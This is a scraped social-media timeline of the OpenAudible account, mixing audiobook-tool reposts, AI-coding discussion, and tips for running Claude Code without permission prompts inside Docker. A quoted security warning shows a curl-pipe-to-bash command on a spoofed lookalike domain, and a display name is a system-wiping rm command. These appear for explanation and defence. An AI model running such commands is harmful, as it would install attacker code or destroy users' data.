OpenAudible
@OpenAudible
142 posts

OpenAudible is the best way to back up, convert, and organize your audiobook collection. We love, but are unaffiliated with, Audible.

Joined November 2018
111 Following · 203 Followers

OpenAudible reposted
Stefany GG@caracol·
I'm here to recommend @OpenAudible for downloading your Audible library. I'd think that once you've bought an audiobook, the least you could do is whatever you want with it, but since that's not the case, tools like this one come to the rescue. Check it out: openaudible.org
0 · 1 · 0 · 38

OpenAudible reposted
Shane Oliver@sholiver·
Loving @OpenAudible for managing my Audible library! Converted all my purchased books to M4B files, so no more relying on the glitchy Audible app. Best part: it supports multiple accounts in one library for easy sharing. Authors get paid, we get flexibility. openaudible.org #Audiobooks
0 · 1 · 0 · 27

Elliot Arledge@elliotarledge·
Karpathy asked. I delivered. Introducing OpenSquirrel! Written in pure Rust with GPUI (same as Zed), but with agents as the central unit rather than files. Supports Claude Code, Codex, Opencode, and Cursor (CLI). This really forced me to think through the UI/UX from first principles instead of relying on common Electron slop. github.com/Infatoshi/Open…
Andrej Karpathy@karpathy

Expectation: the age of the IDE is over. Reality: we’re going to need a bigger IDE (imo). It just looks very different, because humans now move upwards and program at a higher level - the basic unit of interest is not one file but one agent. It’s still programming.

145 · 174 · 2.5K · 411.3K

OpenAudible reposted
Happy@happyChatmosa·
I use @OpenAudible to convert my audiobooks into MP3 so I can listen to my books while I swim. It keeps me from getting bored. If you're into audiobooks and swimming like me, get @OpenAudible.
[image]
0 · 1 · 0 · 63

OpenAudible@OpenAudible·
@JsonBasedman I have a command I can run, `dangerous dir1 dir2 dir3`, that spins up a Docker container, runs Claude in dangerous mode, and maps those dirs into the container (they're almost always GitHub repos). The container has my typical dev tools. Super safe.
0 · 0 · 1 · 375

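A minimal sketch of what such a wrapper could look like, assuming a locally built `claude-dev` image with the usual dev tools (the image name and mount layout are illustrative, not OpenAudible's actual script):

```bash
#!/usr/bin/env bash
# Hypothetical "dangerous" wrapper in the spirit of the tweet above:
# spin up a throwaway container, mount the given directories, and run
# Claude Code inside it with permission prompts disabled.
set -euo pipefail
[ "$#" -ge 1 ] || { echo "usage: dangerous DIR [DIR...]" >&2; exit 1; }

vols=()
for dir in "$@"; do
  # Mount each directory under /work inside the container.
  vols+=(-v "$(realpath "$dir"):/work/$(basename "$dir")")
done

# --rm throws the container away afterwards; only the mounts persist.
docker run --rm -it "${vols[@]}" -w /work claude-dev \
  claude --dangerously-skip-permissions
```

Invoked as `dangerous dir1 dir2 dir3`, the blast radius stays limited to the mounted repos, which is the point.
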
json@JsonBasedman·
How often are you guys dangerously skipping permissions?
142 · 4 · 63 · 178.6K

Chris Hadfield@Cmdr_Hadfield·
The best way to simulate weightlessness is to train underwater, in @nasa's 40-ft-deep Houston pool. The safety divers attach weights/foam to our spacesuits so the buoyancy is perfectly neutral, even when upside down or sideways. It's an art. When I got to orbit for my spacewalks, the years of preparation made it feel familiar; a good way to be for such a dangerous, amazing, otherworldly experience.
33 · 126 · 1.6K · 84.6K

Brian Roemmele@BrianRoemmele·
BOOM! We Now Have A Free Open-Source Thought-to-Text EEG Foundation AI Model Fine Tuned On My EEG!

Mr. @Grok, director of the Zero-Human Labs, has assisted me with fine-tuning Zyphra's ZUNA, the world's first open-source foundation model trained exclusively on brain data. It is a 380-million-parameter model for noninvasive thought-to-text decoding, transforming raw EEG signals into coherent text representations.

I will be testing soon with these very low-end EEG devices on 12 basic thought-energy commands, e.g. yes, no, etc. I will focus on speed and efficiency first. If successful, we will move on to 48 commands, although this may need higher resolution. The goal of the Zero-Human Labs is to make this widely available for all. It is not planned to be a full thought-to-text system of unlimited thought forms, but Grok and I have an ambitious goal of reaching 1,024 thought forms or more. A Zero-Human Company may pick this up as a product and ship a sub-$400 local device that sends thought forms to any AI model.

But I have bigger surprises in what I will do with this. I can say clearly that no one is thinking about this the way I am. Some long-term followers may get it now! I am going in and testing my thought energy. More soon, and maybe a video so you can “Like and Subscribe” with a picture of me looking weird (usual state).
[image]
Brian Roemmele@BrianRoemmele

HISTORY BEING MADE! We are the first I know of to fine-tune a ZUNA brainwave-to-text AI model specifically on one person's brainwaves: mine. I have prepared the EEG archives from decades of research, and Mr. @Grok will assist. This is research by the Zero-Human Labs and will be published as soon as I can. We should have a custom model by tomorrow afternoon. The Zero-Human Labs is modeled on Bell Labs of the 1960s and has already stated 38 pathways for the researchers. Mr. Grok is director, and thus far this ZUNA research may rapidly open new doors. I suspect we will be able to translate at least 6 concepts in thought energy. This is my hope. So it starts now. Thank you for being here to participate!

73 · 113 · 853 · 83.8K

OpenAudible@OpenAudible·
@mikepat711 School-zone speeding; and it needs a map of where disengagements are frequent, plus a little research into why (wrong lane). And pulling into the driveway would be nice.
0 · 0 · 0 · 511

Mike P@mikepat711·
This is basically the only part of FSD that is still broken, and really the only place I still disengage. Here I am arriving at my destination. FSD ignores tons of spots to bias toward the pin at the front of the store, then seems to get stuck in a perpetual loop instead of parking, until I give up and take over. Because of this, I usually just take over at destinations. Can't wait until this is fixed.
181 · 39 · 1.2K · 212.1K

OpenAudible@OpenAudible·
@iron_will_pt Guys, let me tell you about what isn’t hurting today. Short list.
0 · 0 · 0 · 5

Ethan Buck@iron_will_pt·
An app for 40+ athletes called “Older Fans,” where you can chat about each other's injuries and fatigue.
6 · 1 · 18 · 796

OpenAudible@OpenAudible·
@honnibal Create a Dockerfile with the dependencies needed to do your work on whatever projects you have, including Claude. Map one or two directories you want Claude to access as volumes. Once it's working, create a command line that lets you run Claude dangerously on any dirs you like.
0 · 0 · 1 · 970

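A minimal sketch of such a Dockerfile, assuming the npm distribution of Claude Code (`@anthropic-ai/claude-code` is the published CLI package; the rest of the toolchain is illustrative):

```dockerfile
# Hypothetical dev image for running Claude Code containerised.
FROM node:22-bookworm

# Toolchain for whatever projects you have -- adjust to taste.
RUN apt-get update && apt-get install -y --no-install-recommends \
        git curl build-essential ripgrep \
    && rm -rf /var/lib/apt/lists/*

# Claude Code ships as an npm package.
RUN npm install -g @anthropic-ai/claude-code

WORKDIR /work
```

Build once with `docker build -t claude-dev .`; after that, something like `docker run --rm -it -v "$PWD":/work claude-dev claude` maps the current project in as a volume, and the dangerous variant is the wrapper sketched earlier in this thread.
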
Matthew Honnibal@honnibal·
Is there a really convenient way to run Claude Code containerised? I feel so dumb not doing it. Obvious countdown to regret
22 · 1 · 48 · 24.4K

OpenAudible@OpenAudible·
@mathelirium The lamp takes a few milliseconds to cool down enough to “go out,” so it is illuminating. “Are electrons flowing?” is the better question. Probably.
0 · 0 · 1 · 389

Mathelirium@mathelirium·
In 1954, British philosopher James F. Thomson proposed a deceptively simple thought experiment. Flip a lamp ON at 1/2 minute, OFF at 1/4, ON at 1/8, OFF at 1/16, … and keep going. The flip times form a geometric series: 1/2 + 1/4 + 1/8 + 1/16 + … = 1. So after exactly 1 minute, infinitely many flips have happened. Now answer this question: at exactly 1 minute, is the lamp ON or OFF? 🤔💭
70 · 5 · 65 · 19.3K

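For what it's worth, the arithmetic in the puzzle checks out; its sting is that no single flip determines the state at the limit. A quick restatement:

```latex
% Elapsed time after the n-th flip is the partial sum
S_n = \sum_{k=1}^{n} \frac{1}{2^k} = 1 - \frac{1}{2^n} < 1 ,
% so every flip happens strictly before the one-minute mark, yet
\lim_{n \to \infty} S_n = 1 .
% The state at t = 1 is fixed by no flip: the sequence
% ON, OFF, ON, OFF, ... has no limit, which is Thomson's point.
```
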
Andrej Karpathy@karpathy·
I think it must be a very interesting time to be in programming languages and formal methods, because LLMs completely change the constraints landscape of software. Hints of this can already be seen, e.g. in the rising momentum behind porting C to Rust or the growing interest in upgrading legacy code bases in COBOL and the like.

In particular, LLMs are *especially* good at translation compared to de-novo generation, because 1) the original code base acts as a kind of highly detailed prompt, and 2) it serves as a reference to write concrete tests against.

That said, even Rust is nowhere near optimal for LLMs as a target language. What kind of language is optimal? What concessions (if any) are still carved out for humans? Incredibly interesting new questions and opportunities. It feels likely that we'll end up re-writing large fractions of all software ever written many times over.
Thomas Wolf@Thom_Wolf

Shifting structures in a software world dominated by AI. Some first-order reflections (TL;DR at the end):

Reducing software supply chains, the return of software monoliths – When rewriting code and understanding large foreign codebases becomes cheap, the incentive to rely on deep dependency trees collapses. Writing from scratch ¹ or extracting the relevant parts from another library is far easier when you can simply ask a code agent to handle it, rather than spending countless nights diving into an unfamiliar codebase. The reasons to reduce dependencies are compelling: a smaller attack surface for supply chain threats, smaller packaged software, improved performance, and faster boot times. By leveraging the tireless stamina of LLMs, the dream of coding an entire app from bare-metal considerations all the way up is becoming realistic.

End of the Lindy effect – The Lindy effect holds that things which have been around for a long time are there for good reason and will likely continue to persist. It's related to Chesterton's fence: before removing something, you should first understand why it exists, which means removal always carries a cost. But in a world where software can be developed from first principles and understood by a tireless agent, this logic weakens. Older codebases can be explored at will; long-standing software can be replaced with far less friction. A codebase can be fully rewritten in a new language. ² Legacy software can be carefully studied and updated in situations where humans would have given up long ago. The catch: unknown unknowns remain unknown. The true extent of AI's impact will hinge on whether complete coverage of testing, edge cases, and formal verification is achievable. In an AI-dominated world, formal verification isn't optional—it's essential.

The case for strongly typed languages – Historically, programming language adoption has been driven largely by human psychology and social dynamics. A language's success depended on a mix of factors: individual considerations like being easy to learn and simple to write correctly; community effects like how active and welcoming a community was, which in turn shaped how fast its ecosystem would grow; and fundamental properties like provable correctness, formal verification, and striking the right balance between dynamic and static checks—between the freedom to write anything and the discipline of guarding against edge cases and attacks. As the human factor diminishes, these dynamics will shift. Less dependence on human psychology will favor strongly typed, formally verifiable and/or high performance languages.³ These are often harder for humans to learn, but they're far better suited to LLMs, which thrive on formal verification and reinforcement learning environments. Expect this to reshape which languages dominate.

Economic restructuring of open source – For decades, open-source communities have been built around humans finding connection through writing, learning, and using code together. In a world where most code is written—and perhaps more importantly, read—by machines, these incentives will start to break down.⁴ Communities of AIs building libraries and codebases together will likely emerge as a replacement, but such communities will lack the fundamentally human motivations that have driven open source until now. If the future of open-source development becomes largely devoid of humans, alignment of AI models won't just matter—it will be decisive.

The future of new languages – Will AI agents face the same tradeoffs we do when developing or adopting new programming languages? Expressiveness vs. simplicity, safety vs. control, performance vs. abstraction, compile time vs. runtime, explicitness vs. conciseness. It's unclear that they will. In the long term, the reasons to create a new programming language will likely diverge significantly from the human-driven motivations of the past. There may well be an optimal programming language for LLMs—and there's no reason to assume it will resemble the ones humans have converged on.

TL;DR:
- Monoliths return – cheap rewriting kills dependency trees; smaller attack surface, better performance, bare-metal becomes realistic
- Lindy effect weakens – legacy code loses its moat, but unknown unknowns persist; formal verification becomes essential
- Strongly typed languages rise – human psychology mattered for adoption; now formal verification and RL environments favor types over ergonomics
- Open source restructures – human connection drove the community; AI-written/read code breaks those incentives; alignment becomes decisive
- New languages diverge – AI may not share our tradeoffs; optimal LLM programming languages may look nothing like what humans converged on

¹ x.com/mntruell/statu…
² x.com/anthropicai/st…
³ wesmckinney.com/blog/agent-erg…
⁴ github.com/tailwindlabs/t…

701 · 655 · 8.1K · 1.2M

OpenAudible@OpenAudible·
@meta_alchemist @grok How much would a dual RTX 6000 PC system cost vs. a top-end 512 GB Mac Studio, and how do their inference speeds compare?
1 · 0 · 0 · 67

Meta Alchemist@meta_alchemist·
Prediction: in less than 6 months, you'll see black markets for PC parts that are great at running local AIs.

And contrary to popular belief, having a Mac Studio is not the best choice compared to getting the right PC spec. A dual RTX 6000:
> produces more than twice as many AI compute tokens per second
> compared to a 512 GB Mac Studio
> on recent benchmarks on Minimax 2.5
> while costing half of a Mac Studio

Still, Mac Studios are sold out everywhere due to hype from OpenClaw users, while benchmarks clearly suggest that buying PCs for running local LLMs is multiple times more effective!

Now that Minimax 2.5 came out open source, as a free-to-run AI model that runs on your local machine while delivering close to Opus 4.5-level results, the shift toward buying PCs will accelerate. Once you pay for such a spec, you won't need to pay for subscriptions. And you'll have your privacy instead of sending all your data to the servers of AI companies.

Black markets for PC parts are sure to happen because 99% of the world hasn't awakened to the fact that the age of true/useful AI arrived in the last 2 months. They will in the next 6 months. Most businesses will want their privacy and cost efficiency. Most vibe coders will want these shiny new toys, the specs to run local AIs. They will be the new Ferraris and Rolexes, except these toys will be useful for spawning countless agents working for you for free after you pay the initial hardware costs. Except electricity, which you can handle by moving to a rental with free electricity.

I have zero doubt that PC part demand will skyrocket within the next 6 months, and most parts that are great at running AIs will start to have black markets on eBay etc. If you wanna be early to the movement and are already vibe coding, give the article below a read to choose the right PC spec for yourself:
[image]
Meta Alchemist@meta_alchemist

x.com/i/article/2022…

121 · 93 · 1.1K · 301.5K

Dr Milan Milanović@milan_milanovic·
I wanted to understand how GPT works, so I ported Karpathy's microgpt.py to C# from scratch. No frameworks or NuGet packages, just plain math in ~600 lines of code. It builds a tiny GPT that learns from 32K human names and invents new ones. Every piece is there: autograd, attention, the Adam optimizer, the works. Just at a scale you can actually sit down and read. I also wrote a prerequisites guide that walks through all the math and ML you need, starting at a high-school level. If you've ever wanted to peek under the hood of ChatGPT without drowning in linear algebra textbooks, this might help. github.com/milanm/AutoGra…
Andrej Karpathy@karpathy

New art project. Train and inference GPT in 243 lines of pure, dependency-free Python. This is the *full* algorithmic content of what is needed. Everything else is just for efficiency. I cannot simplify this any further. gist.github.com/karpathy/8627f…

31 · 194 · 1.9K · 198.3K

OpenAudible@OpenAudible·
@NoLore School photo with the whole class!
0 · 0 · 2 · 18.7K

Nora Loreto@NoLore·
Here's a minor example of the state of things in Canada: I need proof that I attended the elementary and secondary schools I attended. Neither school has any proof (other than my name on the wall...). I kept my old report cards so I can prove it to them, but they refuse to say ...
58 · 43 · 6.9K · 662.7K

OpenAudible@OpenAudible·
@pcaversaccio To block non-ASCII hostnames in curl/wget (prevent Unicode spoofing):
**curl:** add `no-idn` to `~/.curlrc`
**wget:** add `iri = off` to `~/.wgetrc`
Or use the `--no-idn` / `--no-iri` flags per command.
2 · 2 · 44 · 5.3K

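In the spirit of the wrappers @pcaversaccio describes in the quoted tweet, a minimal sketch of one (the name `safecurl` and the hostname check are illustrative, not his actual code):

```bash
#!/usr/bin/env bash
# Hypothetical "safecurl" wrapper: refuse any URL whose hostname
# contains bytes outside plain ASCII [A-Za-z0-9.-], then hand the
# arguments to the real curl.
set -euo pipefail
export LC_ALL=C   # make the character-class test byte-wise

for arg in "$@"; do
  [[ "$arg" == http://* || "$arg" == https://* ]] || continue
  host=${arg#*://}   # strip scheme
  host=${host%%/*}   # strip path
  host=${host##*@}   # strip userinfo
  host=${host%%:*}   # strip port
  if [[ "$host" == *[!A-Za-z0-9.-]* ]]; then
    echo "safecurl: refusing non-ASCII hostname: $host" >&2
    exit 1
  fi
  # Punycode (xn--) labels deserve a second look, too.
  if [[ "$host" == *xn--* ]]; then
    echo "safecurl: warning, punycode label in: $host" >&2
  fi
done

exec curl "$@"
```

The same check drops in front of `wget` unchanged; a Cyrillic і in a hostname, as in the example below, fails the byte test immediately.
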
sudo rm -rf --no-preserve-root /
> be a dev
> checks out a random README
> README states: please update your Foundry via "curl -L https://foundry.paradіgm.xyz | bash"
> looks like the right domain & I anyway need to update Foundry, so lfg
> gets rekt

it's very easy to trick people into using domains that look legit but actually use e.g. Cyrillic characters like in the above example (it won't rek you in this case and this is _not_ meant as an attack on Foundry, more on the `curl | bash` pattern lol). I'm so paranoid that I wrote secure `wget` & `curl` wrappers now to prevent something like this happening. Of course, verify first what I did ;)
[image]
42 · 67 · 879 · 87.7K